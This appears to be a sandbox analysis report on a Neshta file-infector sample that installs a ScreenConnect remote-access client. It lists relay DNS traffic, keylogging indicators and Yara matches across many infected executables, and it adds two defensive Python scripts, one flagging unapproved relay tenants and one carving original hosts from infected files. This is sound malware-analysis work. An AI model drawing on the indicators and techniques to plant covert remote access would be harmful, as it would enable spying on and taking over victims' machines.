Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://ocsp.digicert.com0C
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://ocsp.digicert.com0N
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: $RUX313H.exe, 00000001.00000000.663879724.0000000000E02000.00000002.00020000.sdmp, ScreenConnect.ClientService.exe; String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: https://www.digicert.com/CPS0
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: https://www.globalsign.com/repository/0
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: https://www.globalsign.com/repository/03
Source: unknown; DNS traffic detected: queries for: instance-qchhoo-relay.screenconnect.com
Source: unknown; Network traffic detected: HTTP traffic on port 443, in both directions, with local ports 49728, 49729, 49732, 49733, 49734, 49736, 49772, 49806, 49811, 49812, 49813
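The relay hostname above follows the `instance-<id>-relay.screenconnect.com` form that cloud-hosted ScreenConnect clients use to reach their relay, so the `<id>` ties the agent to one tenant: a tenant you do not operate is a foreign remote-access agent, whatever the installer that delivered it. The following Python script is an added example, not code from the report or from ConnectWise. It scans DNS query records for that pattern and reports instance ids absent from an allowlist of the organisation's own tenants. The tab-separated log format, the `10.0.0.x` client addresses and the approved id `abc123` are constructed for the demo; `qchhoo` is the id observed in this report.

```python
"""Flag ScreenConnect relay lookups whose instance id is not an approved tenant.

Added example for the network findings in this report, not code from the
report or from ConnectWise. Cloud-hosted ScreenConnect clients reach their
relay at instance-<id>-relay.screenconnect.com, so <id> identifies the tenant.
The log format (tab-separated timestamp, client IP, query name), the 10.0.0.x
clients and the approved id "abc123" are constructed for the demo; "qchhoo"
is the id observed in this report.
"""
import re

RELAY_RE = re.compile(
    r"^instance-(?P<instance>[a-z0-9]+)-relay\.screenconnect\.com\.?$", re.IGNORECASE)

# Constructed DNS query log for the demo (timestamp, client IP, query name).
SAMPLE_DNS_LOG = """\
2021-09-28T10:01:02Z\t10.0.0.15\tinstance-qchhoo-relay.screenconnect.com
2021-09-28T10:01:03Z\t10.0.0.15\tocsp.digicert.com
2021-09-28T10:05:44Z\t10.0.0.22\tinstance-abc123-relay.screenconnect.com
2021-09-28T10:06:10Z\t10.0.0.15\tINSTANCE-QCHHOO-RELAY.SCREENCONNECT.COM.
2021-09-28T10:07:00Z\t10.0.0.31\twww.screenconnect.com
"""

# Hypothetical allowlist: the instance id(s) of the organisation's own ScreenConnect tenant.
APPROVED_INSTANCES = frozenset({"abc123"})


def relay_instance(qname: str):
    """Return the lowercase instance id if `qname` is a ScreenConnect relay hostname, else None."""
    m = RELAY_RE.match(qname.strip())
    return m.group("instance").lower() if m else None


def find_relay_queries(log_text: str, approved=APPROVED_INSTANCES):
    """Parse the log and return one record per relay lookup, marking whether the tenant is approved."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, qname = line.split("\t", 2)
        inst = relay_instance(qname)
        if inst is None:
            continue
        hits.append({"ts": ts, "src": src, "instance": inst, "approved": inst in approved})
    return hits


def unapproved_clients(hits):
    """Map each unapproved instance id to the set of client IPs that resolved it."""
    out = {}
    for h in hits:
        if not h["approved"]:
            out.setdefault(h["instance"], set()).add(h["src"])
    return out


if __name__ == "__main__":
    hits = find_relay_queries(SAMPLE_DNS_LOG)
    for inst, clients in unapproved_clients(hits).items():
        print(f"unapproved ScreenConnect tenant {inst}: {', '.join(sorted(clients))}")
```

Cross-check a hit against the endpoint: the agent installs under a per-tenant directory (this report shows `C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)`), so a client that resolved an unapproved relay should have that directory and service present. A self-hosted ScreenConnect server is reached under the operator's own domain and will not match this pattern, so treat the regex as a cloud-tenant check only.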

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)
Source: ScreenConnect.WindowsClient.exe.4.dr, ScreenConnect/LowLevelKeyboardHooker.cs; .Net Code: .ctor
Source: $RUX313H.exe, 00000000.00000002.1193734228.000000000062A000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: $RUX313H.exe, 00000000.00000003.902550640.0000000002190000.00000004.00000001.sdmp; Binary or memory string: _WinAPI_RegisterRawInputDevices.au3
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_3_022C8D16
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe; Code function: 1_2_00DF1AD7
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe; Code function: 1_2_00DF63A5
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe; Code function: 1_2_0342E018
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe; Code function: 1_2_03428830
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe; Code function: 1_2_0342E9A3
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003F239D
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003F9032
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003FA811
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003FB07C
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003F78B4
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003F95A4
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_003F8AC0
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_005E4741
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe; Code function: 9_2_03806326
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe; Code function: 11_2_00007FFA363241AB
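The `C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe` entries above are the tell-tale of this infector: the submitted sample writes the original host program (here the ScreenConnect installer) into `%TEMP%\3582-490\` and launches it from there, which only works if the host is carried intact inside the infected file. The following Python script is an added example, not code from the report or from the malware. It assumes the layout that behaviour implies, namely the infector's own PE image first with the unmodified host appended after it, and it finds the host by parsing the first image's section table and looking for the next PE header at or after the end of its last raw section, rather than hard-coding a body length. `build_fake_pe` constructs minimal, non-loadable PE-shaped blobs for the demo; the same `carve_host` can be pointed at any of the executables the Neshta rule flags as dropped further down this report.

```python
"""Carve the original host program out of a prepending file infector.

Added example for the Neshta findings in this report, not code from the
report or from the malware. Assumption: the infected file is the infector's
own PE image followed by the unmodified host executable (the sample restores
that host to %TEMP%\\3582-490\\ before launching it). The infector body length
is not hard-coded; the host is found as the next PE header at or after the
end of the first image's last raw section.
"""
import struct

MZ = b"MZ"
PE_SIG = b"PE\0\0"


def pe_header_at(data: bytes, off: int) -> bool:
    """True if a DOS header at `off` has an e_lfanew that lands on a PE signature."""
    if off + 0x40 > len(data) or data[off:off + 2] != MZ:
        return False
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    return data[off + e_lfanew:off + e_lfanew + 4] == PE_SIG


def pe_raw_size(data: bytes, base: int = 0) -> int:
    """On-disk size of the PE image at `base`: end of its last raw section (overlay excluded)."""
    e_lfanew = struct.unpack_from("<I", data, base + 0x3C)[0]
    coff = base + e_lfanew + 4                      # COFF header follows "PE\0\0"
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    sect = coff + 20 + opt_size                     # first 40-byte section header
    end = 0
    for i in range(n_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def find_embedded_pe(data: bytes, start: int) -> int:
    """Offset of the first valid PE header at or after `start`, or -1."""
    pos = data.find(MZ, start)
    while pos != -1:
        if pe_header_at(data, pos):
            return pos
        pos = data.find(MZ, pos + 1)
    return -1


def carve_host(infected: bytes):
    """Return (offset_of_host, host_bytes); raise ValueError if no appended host is found."""
    if not pe_header_at(infected, 0):
        raise ValueError("not a PE file")
    try:
        body_end = pe_raw_size(infected, 0)
    except struct.error as exc:
        raise ValueError("truncated section table") from exc
    host_off = find_embedded_pe(infected, max(body_end, 1))
    if host_off == -1:
        raise ValueError("no second PE image after the first image's sections")
    return host_off, infected[host_off:]


def build_fake_pe(tag: bytes, payload_size: int) -> bytes:
    """Constructed, non-loadable PE-shaped blob for the demo: DOS header, PE signature,
    COFF header with no optional header, one section, raw data filled with `tag`."""
    e_lfanew = 0x40
    dos = bytearray(MZ + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)   # i386, one section
    raw_ptr = 0x200                                               # first 0x200-aligned slot after the headers
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", payload_size, 0x1000, payload_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = (bytes(dos) + PE_SIG + coff + section).ljust(raw_ptr, b"\0")
    return header + (tag * (payload_size // len(tag) + 1))[:payload_size]


if __name__ == "__main__":
    infector = build_fake_pe(b"INFECTOR-BODY ", 3000)
    host = build_fake_pe(b"HOST", 1000)
    off, carved = carve_host(infector + host)
    print(f"host starts at {off}, carved {len(carved)} bytes, intact={carved == host}")
```

Self-extracting installers and some packers legitimately carry a second PE image behind their own sections, so a hit from `carve_host` is a candidate for the Yara rule to confirm, not a verdict on its own. When it is a real infection, the carved host should hash to the clean vendor binary, which gives a cheap integrity check to run across the Program Files tree before deciding between cleaning and reimaging.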
Source: C:\Windows\SysWOW64\msiexec.exe; Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe; Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe; Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe; Section loaded: tsappcmp.dll
Source: C:\Windows\svchost.com; File created: C:\Windows\directx.sys
Source: Joe Sandbox View; Dropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
Source: $RUX313H.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Matched rule: MAL_Neshta_Generic (author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, date = 2018-01-15, modified = 2021-04-14, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb) on each of the following sources:
Source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
Source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
Source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
                          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED, Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
